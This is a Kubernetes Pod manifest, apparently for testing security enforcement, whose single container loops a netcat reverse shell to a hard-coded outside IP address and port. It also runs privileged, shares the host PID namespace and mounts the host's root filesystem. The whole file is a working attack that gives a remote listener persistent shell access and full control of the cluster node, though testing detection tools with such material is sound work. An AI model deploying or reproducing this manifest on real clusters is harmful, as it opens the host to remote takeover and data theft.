apiVersion: v1
kind: Pod
metadata:
  name: testpod-enforcement  # New name for testing
  namespace: node-simple-test  # Changed namespace to 'test'
  labels:
    app: nc
spec:
  hostPID: true  # Allow sharing of the host's PID namespace
  containers:
  - name: cyereverseshell
    image: busybox
    args: ["sh", "-c", "while true; do nc 68.183.22.232 4642 -e /bin/sh; sleep 10; done"]
    securityContext:
      allowPrivilegeEscalation: true
      privileged: true  # Allow privileged mode
    volumeMounts:
    - name: hostvolume
      mountPath: /host
  volumes:
  - name: hostvolume
    hostPath:
      path: /
      type: Directory
